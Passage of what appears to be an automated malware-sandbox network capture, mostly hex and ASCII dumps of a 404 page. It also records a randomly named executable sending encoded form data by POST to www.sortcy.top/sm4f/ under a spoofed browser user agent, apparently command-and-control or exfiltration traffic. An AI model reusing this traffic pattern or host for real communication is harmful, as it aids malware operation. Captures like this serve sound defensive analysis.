                                                          Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                                          Nov 5, 2024 15:44:33.583183050 CET1236INData Raw: 33 2d 2e 38 35 2d 2e 35 33 32 2d 2e 39 38 37 4d 32 31 2e 37 32 32 20 31 30 2e 31 30 31 63 2d 2e 34 38 34 2d 2e 32 38 2d 31 2e 31 36 2e 30 38 2d 31 2e 35 34 32 2e 33 37 38 2d 2e 35 37 2e 34 34 34 2d 2e 39 35 37 2e 39 32 34 2d 31 2e 31 35 32 20 31
                                                          Data Ascii: 3-.85-.532-.987M21.722 10.101c-.484-.28-1.16.08-1.542.378-.57.444-.957.924-1.152 1.628-.21.764.802 1.182 1.296.663.4-.42.901-.746 1.308-1.172.319-.334.594-1.205.09-1.497M23.513 15.078c-.385.414-.505 1.566-.513 2.381-.005.47.333.749.47.35.206-.
                                                          Nov 5, 2024 15:44:33.583194017 CET1236INData Raw: 36 37 38 2e 36 36 34 2e 37 34 31 2e 30 38 2e 30 36 38 2d 2e 36 32 38 2e 34 32 2d 32 2e 34 30 35 2d 2e 33 30 36 2d 32 2e 36 30 38 4d 35 34 2e 38 30 33 20 31 36 2e 33 30 31 63 2d 2e 30 36 35 2d 2e 33 34 37 2d 2e 31 2d 2e 37 30 39 2d 2e 31 39 2d 31
                                                          Data Ascii: 678.664.741.08.068-.628.42-2.405-.306-2.608M54.803 16.301c-.065-.347-.1-.709-.19-1.038-.107-.393-.44-.32-.532.052-.186.746-.052 2.313.405 2.636.225.16.545-.077.512-.623-.024-.375-.13-.676-.195-1.027M39.534 21.024c-.423.212-.58 1.352-.523 2.174
                                                          Nov 5, 2024 15:44:33.583440065 CET36INData Raw: 38 2e 33 30 31 20 31 2e 37 33 38 2e 37 38 38 20 31 2e 35 38 36 2d 2e 32 34 35 2d 2e 31 34 31 2d 2e 39 36 33
                                                          Data Ascii: 8.301 1.738.788 1.586-.245-.141-.963
                                                          Nov 5, 2024 15:44:33.583451033 CET1236INData Raw: 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37
                                                          Data Ascii: -.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.06
                                                          Nov 5, 2024 15:44:33.583462954 CET1236INData Raw: 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37
                                                          Data Ascii: .181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.933-.445 1.28.216.11.4.251.557.
                                                          Nov 5, 2024 15:44:33.588130951 CET1236INData Raw: 6c 2e 30 32 37 2d 2e 30 35 33 63 2e 30 36 2d 2e 31 31 34 2e 30 38 33 2d 2e 32 36 36 2d 2e 30 32 35 2d 2e 33 37 32 4d 31 30 36 2e 37 39 38 20 32 32 2e 32 32 63 2d 2e 31 30 37 2d 2e 32 39 32 2d 2e 37 35 37 2d 2e 33 30 34 2d 2e 37 39 34 2e 30 32 38
                                                          Data Ascii: l.027-.053c.06-.114.083-.266-.025-.372M106.798 22.22c-.107-.292-.757-.304-.794.028-.032.293.107.618.488.731.229.068.532-.032.507-.257-.021-.186-.137-.329-.201-.502M70.884 28.197c-.13-.291-.716-.24-.83.025-.131.304-.034.606.41.754.101.033.24.03


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          30192.168.2.450033184.94.215.26802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:35.709397078 CET729OUTPOST /sm4f/ HTTP/1.1
                                                          Host: www.sortcy.top
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.sortcy.top
                                                          Referer: http://www.sortcy.top/sm4f/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 224
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4a 59 73 73 6f 68 33 69 71 43 58 63 4a 4a 74 62 76 62 72 59 46 45 47 6b 35 55 6c 65 6b 4d 57 73 71 2b 36 4a 6e 72 6d 7a 53 58 50 36 43 34 78 75 70 77 52 34 38 53 7a 4f 6c 44 4e 75 64 50 62 6c 32 51 49 4b 70 68 54 58 4f 4d 34 34 66 36 59 6e 55 4a 30 32 2b 74 57 7a 79 63 4e 75 36 59 4a 4e 66 7a 2f 52 42 2b 76 62 67 59 41 4a 5a 79 38 50 49 46 41 72 74 31 78 69 75 72 45 44 4d 48 77 53 56 74 2b 4d 59 74 52 68 52 65 55 7a 57 2b 69 46 59 78 6c 35 54 52 2f 58 77 4e 79 53 72 79 30 64 39 77 70 42 6a 4c 43 64 41 62 70 34 72 48 51 59 79 76 53 73 48 6d 37 4a 53 4c 35 61 30 39 53 43 74 32 6e 53 4e 55 6a 2b 51 50 4d 4a 70 52 4d 59 36 2b 54 68 65 7a 38 3d
                                                          Data Ascii: H0kxIVc=JYssoh3iqCXcJJtbvbrYFEGk5UlekMWsq+6JnrmzSXP6C4xupwR48SzOlDNudPbl2QIKphTXOM44f6YnUJ02+tWzycNu6YJNfz/RB+vbgYAJZy8PIFArt1xiurEDMHwSVt+MYtRhReUzW+iFYxl5TR/XwNySry0d9wpBjLCdAbp4rHQYyvSsHm7JSL5a09SCt2nSNUj+QPMJpRMY6+Thez8=
                                                          Nov 5, 2024 15:44:36.379184961 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:36 GMT
                                                          Server: Apache
                                                          Content-Length: 13840
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                          Nov 5, 2024 15:44:36.379194975 CET1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                          Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                          Nov 5, 2024 15:44:36.379301071 CET1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                          Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                          Nov 5, 2024 15:44:36.379324913 CET1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                                          Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                                          Nov 5, 2024 15:44:36.379331112 CET848INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                                                          Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                                          Nov 5, 2024 15:44:36.379436970 CET1236INData Raw: 32 34 33 2d 2e 33 36 33 2e 36 33 2d 2e 36 37 35 2e 37 36 37 2d 31 2e 30 36 34 2e 31 37 33 2d 2e 34 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38
                                                          Data Ascii: 243-.363.63-.675.767-1.064.173-.486-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c
                                                          Nov 5, 2024 15:44:36.380254030 CET1236INData Raw: 37 2d 2e 34 37 39 2d 2e 33 37 2e 30 38 35 2d 2e 32 34 2e 33 31 35 2e 30 34 34 2e 33 39 36 2e 36 30 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e
                                                          Data Ascii: 7-.479-.37.085-.24.315.044.396.601.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.0
                                                          Nov 5, 2024 15:44:36.380422115 CET424INData Raw: 35 37 2e 39 32 35 2e 31 37 33 2e 32 32 37 2d 2e 30 35 31 2e 34 34 34 2d 2e 31 30 34 2e 37 30 35 2d 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e
                                                          Data Ascii: 57.925.173.227-.051.444-.104.705-.13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.32
                                                          Nov 5, 2024 15:44:36.380429983 CET1236INData Raw: 2d 2e 37 38 39 2d 31 2e 36 35 32 2d 31 2e 35 35 31 2d 32 2e 30 39 4d 37 38 2e 39 35 35 20 38 2e 30 38 32 63 2d 2e 31 33 34 2d 2e 35 35 2d 2e 32 35 39 2d 31 2e 31 32 36 2d 2e 33 36 36 2d 31 2e 37 30 33 2d 2e 31 30 32 2d 2e 35 34 38 2d 2e 34 35 37
                                                          Data Ascii: -.789-1.652-1.551-2.09M78.955 8.082c-.134-.55-.259-1.126-.366-1.703-.102-.548-.457-.476-.541.05-.073.453-.057.877.01 1.331.083.548.286.874.512 1.17.11.144.276.048.357-.132.097-.215.088-.476.028-.716M87.395 8c-.77.016-1.317.338-2.032.43-.505.06
                                                          Nov 5, 2024 15:44:36.380434990 CET212INData Raw: 2e 31 38 31 2d 2e 30 34 33 2e 33 35 37 2d 2e 30 35 33 2e 35 33 39 2d 2e 30 31 33 2e 32 34 35 2e 30 31 36 2e 34 35 2e 30 36 2e 36 31 32 2e 30 39 31 2e 33 33 2e 33 32 2e 35 31 35 2e 35 33 2e 33 30 34 2e 31 30 38 2d 2e 31 31 2e 32 38 36 2d 2e 33 37
                                                          Data Ascii: .181-.043.357-.053.539-.013.245.016.45.06.612.091.33.32.515.53.304.108-.11.286-.37.335-.709.04-.276.058-.554.07-.836.024-.568-.189-1.052-.466-1.306M108.458 14.127c-.434-.548-.995-.921-1.662-1.103-.746-.203-1.116.
                                                          Nov 5, 2024 15:44:36.386878967 CET1236INData Raw: 39 33 33 2d 2e 34 34 35 20 31 2e 32 38 2e 32 31 36 2e 31 31 2e 34 2e 32 35 31 2e 35 35 37 2e 34 34 33 2e 32 30 34 2e 32 34 38 2e 34 32 2e 36 34 38 2e 36 37 32 2e 38 34 2e 33 34 38 2e 32 36 32 2e 38 36 38 2e 36 34 35 20 31 2e 32 34 39 2e 32 33 2e
                                                          Data Ascii: 933-.445 1.28.216.11.4.251.557.443.204.248.42.648.672.84.348.262.868.645 1.249.23.437-.478-.064-1.305-.37-1.69M117.71 13.184c-.282.276-.558.555-.852.815-.143.126-.333.256-.446.42-.108.156-.174.34-.284.489-.392.535.193 1.412.694.973.104-.091.31


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          31192.168.2.450034184.94.215.26802816C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          TimestampBytes transferredDirectionData
                                                          Nov 5, 2024 15:44:38.259994030 CET10811OUTPOST /sm4f/ HTTP/1.1
                                                          Host: www.sortcy.top
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US
                                                          Origin: http://www.sortcy.top
                                                          Referer: http://www.sortcy.top/sm4f/
                                                          Cache-Control: max-age=0
                                                          Content-Length: 10304
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Connection: close
                                                          User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10.6; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3
                                                          Data Raw: 48 30 6b 78 49 56 63 3d 4a 59 73 73 6f 68 33 69 71 43 58 63 4a 4a 74 62 76 62 72 59 46 45 47 6b 35 55 6c 65 6b 4d 57 73 71 2b 36 4a 6e 72 6d 7a 53 58 48 36 43 4f 39 75 76 58 39 34 39 53 7a 4f 76 6a 4e 76 64 50 61 39 32 51 51 30 70 68 58 70 4f 4a 38 34 64 5a 51 6e 57 34 30 32 31 74 57 7a 38 4d 4e 74 6e 49 4a 69 66 33 6a 56 42 2b 2f 62 67 59 41 4a 5a 7a 73 50 4d 58 6b 72 76 31 78 6c 2b 37 45 48 61 33 77 70 56 74 6e 78 59 74 56 58 45 36 67 7a 50 61 4f 46 66 44 39 35 4d 68 2f 5a 33 4e 79 30 72 79 35 44 39 77 31 6a 6a 4c 62 56 41 63 68 34 72 67 74 34 71 66 44 77 61 58 75 55 45 70 5a 66 76 4e 75 52 75 31 33 54 63 58 6e 2b 51 65 38 31 7a 6a 4d 49 71 75 66 70 4d 79 34 58 57 67 43 43 6f 77 30 42 48 30 55 7a 68 71 49 45 63 79 42 61 61 56 37 2b 50 78 42 50 66 47 6f 71 38 37 35 72 44 55 63 4a 51 50 50 4b 39 6c 36 59 59 2f 4a 59 53 34 62 33 7a 54 46 38 38 7a 70 41 67 59 45 62 45 2f 32 53 50 55 4c 50 49 70 55 6b 41 54 6f 33 4d 48 41 41 4b 73 32 6e 79 45 74 32 6a 79 77 36 67 45 53 48 6c 79 78 67 6d 7a 52 4e 45 66 [TRUNCATED]
                                                          Data Ascii: H0kxIVc=JYssoh3iqCXcJJtbvbrYFEGk5UlekMWsq+6JnrmzSXH6CO9uvX949SzOvjNvdPa92QQ0phXpOJ84dZQnW4021tWz8MNtnIJif3jVB+/bgYAJZzsPMXkrv1xl+7EHa3wpVtnxYtVXE6gzPaOFfD95Mh/Z3Ny0ry5D9w1jjLbVAch4rgt4qfDwaXuUEpZfvNuRu13TcXn+Qe81zjMIqufpMy4XWgCCow0BH0UzhqIEcyBaaV7+PxBPfGoq875rDUcJQPPK9l6YY/JYS4b3zTF88zpAgYEbE/2SPULPIpUkATo3MHAAKs2nyEt2jyw6gESHlyxgmzRNEfjQKniYWLd+3tiG7NNSPPJPbsHBKiXi0KCSpoyifkzIQzExfARFOw9KebRbDN1gk31EJvniJuoiTRZQl/OTlW07xG2i01aXabyjEbSapkDi0tnhlxwjcFugvnJVg+pdqIVXxhvh2g4dLyVbINge7C4s2lcsnPHriD1GajwSp3jBSY4Pwo1cZWvwrdgsSuIEL/joQTYt5W8P0mxEy7YO4vtqZPqNp5zi1U3OH8ReGgwRFKj4z0Rn/fD1U6ILMfcei2MO0W5GUiCFKkyIAVElrVndXwMAlFmjYYlcrWZWa/qlDKoCNRAFy67uyamQ/pU0x2hB/6mMii2IjRGY1gjEKL7QxeoXM3IAZd8UQjaeHF7vWn9FeX/IgdH9W7cGlxsROLfX9boAiwP95oNjjFmJc2tE1FSCIAdkfjhFNE8mWx55gBrB67v4xqShmk14eEsBaJALZsDDTcbC3MtwFZQdWG1bsIU3r1FEiK3O/jZsPtTaTpAJsIEpNeQBqPMOZEzvwm8I0YY+B2mg3Bbe+3sGZfeDi1Mzv2uQ/+aeFQvLyNmuK87KXy/K6ihb4ofl1WhTPSwv8QiAPurIvr5UvAxlMzNxLH6Uk2aR5lEYGnTrrR+7wuColIpnTLdTMzRXlI1ZpXtFTrpWIIgxlO5VTOSk2ATZkAdIbHHZLnXU [TRUNCATED]
                                                          Nov 5, 2024 15:44:38.988576889 CET1236INHTTP/1.1 404 Not Found
                                                          Date: Tue, 05 Nov 2024 14:44:38 GMT
                                                          Server: Apache
                                                          Content-Length: 13840
                                                          Connection: close
                                                          Content-Type: text/html
                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 2e 66 75 6e 64 6f 7b 0a 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 73 63 61 6c 65 73 20 33 73 20 61 6c 74 65 72 6e 61 74 65 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 62 61 69 78 6f 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 31 34 73 20 63 75 62 69 63 2d 62 65 7a 69 65 72 28 2e 31 2c 2e 34 39 2c 2e 34 31 2c 2e 39 37 29 20 20 69 6e 66 69 6e 69 74 65 3b 0a 20 20 74 72 61 6e 73 66 6f 72 6d 2d 6f 72 69 67 69 6e 3a 20 63 65 6e 74 65 72 3b 0a 7d 0a 2e 70 61 6f 2d 63 69 6d 61 7b 0a 20 20 20 61 6e 69 6d 61 74 69 6f 6e 3a 20 72 6f 74 61 74 65 70 61 6f 20 37 73 20 31 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <style>.fundo{ animation: scales 3s alternate infinite; transform-origin: center;}.pao-baixo{ animation: rotatepao 14s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.pao-cima{ animation: rotatepao 7s 1s cubic-bezier(.1,.49,.41,.97) infinite; transform-origin: center;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}.left-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 150px 156px;}.right-sparks{animation: left-sparks 4s alternate infinite; transform-origin: 310px 150px;}.olhos{animation: olhos 2s alternate infinite; transform-origin: center;}@keyframes scales{ from { transform: scale(0.98)} to{ transform: scale(1)}}@keyframes rotatepao{ 0% { transform: rotate(0deg)} 50% , 60%{ transform: rotate(-20deg)} 100%{ transform: rotate(0deg) } }@keyframes [TRUNCATED]
                                                          Nov 5, 2024 15:44:38.988653898 CET1236INData Raw: 28 33 30 64 65 67 29 3b 0a 20 20 7d 0a 7d 0a 0a 40 6b 65 79 66 72 61 6d 65 73 20 6c 65 66 74 2d 73 70 61 72 6b 73 7b 0a 20 20 30 25 7b 0a 20 20 20 20 6f 70 61 63 69 74 79 3a 20 30 3b 20 0a 20 20 7d 0a 20 20 0a 7d 0a 0a 0a 2e 6d 61 69 6e 7b 0a 20
                                                          Data Ascii: (30deg); }}@keyframes left-sparks{ 0%{ opacity: 0; } }.main{ min-height: 600px; margin: 0px auto; width: auto; max-width: 460px; display: flex; align-items: center; justify-content: center;}.path { str
                                                          Nov 5, 2024 15:44:38.988662004 CET1236INData Raw: 37 37 34 2d 35 2e 34 33 20 31 2e 34 38 33 2d 31 30 2e 37 36 37 20 33 2e 38 30 38 2d 31 36 2e 33 36 39 20 33 2e 38 34 38 2d 35 2e 36 30 31 2e 30 33 38 2d 31 31 2e 37 36 33 2d 33 2d 31 33 2e 33 38 36 2d 38 2e 38 30 38 2d 31 2e 37 30 37 2d 36 2e 31
                                                          Data Ascii: 774-5.43 1.483-10.767 3.808-16.369 3.848-5.601.038-11.763-3-13.386-8.808-1.707-6.107 2.182-12.41 6.642-16.577 9.072-8.474 21.203-12.707 29.441-22.126 7.927-9.063 11.264-22.574 8.574-34.716-2.692-12.141-11.326-22.538-22.188-26.715-27.683-10.645
                                                          Nov 5, 2024 15:44:38.988699913 CET1236INData Raw: 31 2e 30 32 20 35 33 2e 31 35 2e 32 32 35 20 36 39 2e 31 38 38 2d 31 35 2e 36 38 35 20 37 30 2e 35 39 2d 31 38 2e 39 37 37 20 32 2e 36 30 35 2d 36 2e 31 31 38 20 31 2e 38 33 38 2d 32 31 2e 33 32 37 2e 30 36 2d 32 32 2e 32 38 33 2d 31 2e 37 37 37
                                                          Data Ascii: 1.02 53.15.225 69.188-15.685 70.59-18.977 2.605-6.118 1.838-21.327.06-22.283-1.777-.956-44.044-3.204-72.446-4.057-28.402-.854-49.872-1.968-62.14 4.057" transform="translate(161 68)"/> <path fill="#E6A95F" d="M34.648 167.758c-8
                                                          Nov 5, 2024 15:44:38.988706112 CET848INData Raw: 2e 32 33 39 20 36 2e 30 34 37 20 34 32 2e 39 38 39 20 36 2e 36 37 33 20 32 31 2e 37 35 2e 36 32 35 20 35 37 2e 31 32 36 2d 31 2e 36 37 39 20 36 37 2e 34 32 2d 35 2e 34 35 38 20 39 2e 38 30 36 2d 33 2e 35 39 38 20 31 33 2e 36 36 32 2d 37 2e 30 32
                                                          Data Ascii: .239 6.047 42.989 6.673 21.75.625 57.126-1.679 67.42-5.458 9.806-3.598 13.662-7.027 15.493-5.228 2.396 2.351 1.687 8.008-4.913 12.215-6.252 3.985-27.53 7.2-49.434 7.76-21.904.56-38.604 1.012-49.843-.469" transform="translate(161 68)"/>
                                                          Nov 5, 2024 15:44:38.988712072 CET1236INData Raw: 32 34 33 2d 2e 33 36 33 2e 36 33 2d 2e 36 37 35 2e 37 36 37 2d 31 2e 30 36 34 2e 31 37 33 2d 2e 34 38 36 2d 2e 37 35 33 2d 2e 39 33 2d 31 2e 34 33 2d 2e 36 32 33 4d 32 39 2e 37 39 33 20 39 2e 30 31 32 63 2d 2e 32 36 2d 2e 31 30 38 2d 2e 34 39 38
                                                          Data Ascii: 243-.363.63-.675.767-1.064.173-.486-.753-.93-1.43-.623M29.793 9.012c-.26-.108-.498.532-.62.942-.166.565-.205 1.033-.149 1.674.053.59.424.405.493-.048-.002.014.102-.302.138-.4.093-.247.18-.497.262-.76.113-.359.144-1.297-.124-1.408M38.384 6.056c
                                                          Nov 5, 2024 15:44:38.988718987 CET1236INData Raw: 37 2d 2e 34 37 39 2d 2e 33 37 2e 30 38 35 2d 2e 32 34 2e 33 31 35 2e 30 34 34 2e 33 39 36 2e 36 30 31 2e 31 37 33 20 31 2e 31 36 38 2e 34 30 38 20 31 2e 38 34 38 2e 35 30 33 2e 34 39 2e 30 36 39 20 31 2e 30 34 32 2d 2e 31 39 39 2e 38 33 35 2d 2e
                                                          Data Ascii: 7-.479-.37.085-.24.315.044.396.601.173 1.168.408 1.848.503.49.069 1.042-.199.835-.42M73.956 10.626c-.231-.836-.735-1.255-1.316-1.507-.24-.104-.5-.147-.75-.1-.148.028-.273.063-.407.161-.032.022-.373.238-.223.161-.282.148-.382.791-.057.979.117.0
                                                          Nov 5, 2024 15:44:38.988725901 CET424INData Raw: 35 37 2e 39 32 35 2e 31 37 33 2e 32 32 37 2d 2e 30 35 31 2e 34 34 34 2d 2e 31 30 34 2e 37 30 35 2d 2e 31 33 2e 35 32 31 2d 2e 30 35 34 20 31 2e 30 32 31 2d 2e 30 38 39 20 31 2e 32 38 36 2d 2e 33 31 35 2e 30 39 32 2d 2e 30 37 38 2e 30 38 38 2d 2e
                                                          Data Ascii: 57.925.173.227-.051.444-.104.705-.13.521-.054 1.021-.089 1.286-.315.092-.078.088-.182-.03-.255M52.906 8.291c-.191-.24-.402-.204-.634-.28-.218-.073-.326.255-.245.491.117.34.438.509.697.497.26-.01.37-.472.182-.708M80.437 1.283c-.385-.22-.844-.32
